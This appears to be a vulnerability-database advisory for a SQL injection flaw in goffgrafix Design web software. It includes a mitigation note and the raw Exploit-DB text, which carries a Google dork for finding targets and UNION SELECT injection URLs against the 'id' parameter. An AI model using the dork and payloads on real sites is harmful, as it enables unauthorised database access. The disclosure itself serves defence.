goffgrafix Design's SQL Injection Vulnerability

vendor:

goffgrafix Design

by:

Ashiyane Digital Security Team

9,3

CVSS

HIGH

SQL Injection

CWE

Product Name: goffgrafix Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: a:goffgrafix_design:goffgrafix_design

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

goffgrafix Design’s SQL Injection Vulnerability

goffgrafix Design is vulnerable to SQL injection attacks. Attackers can exploit this vulnerability to gain access to the underlying database and execute arbitrary SQL commands. The vulnerability exists due to insufficient input validation in the "id" parameter of the "page.php" and "designer.php" scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

=========================================================
goffgrafix Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: goffgrafix Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.goffgrafix.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Web design by goffgrafix.com"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/media.php?id=-999+UNION+All+SELECT+1,version(),3,4,5,6,7

[+] Demo: http://server/designer.php?id=-999+UNION+all+SELECT+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

##########################################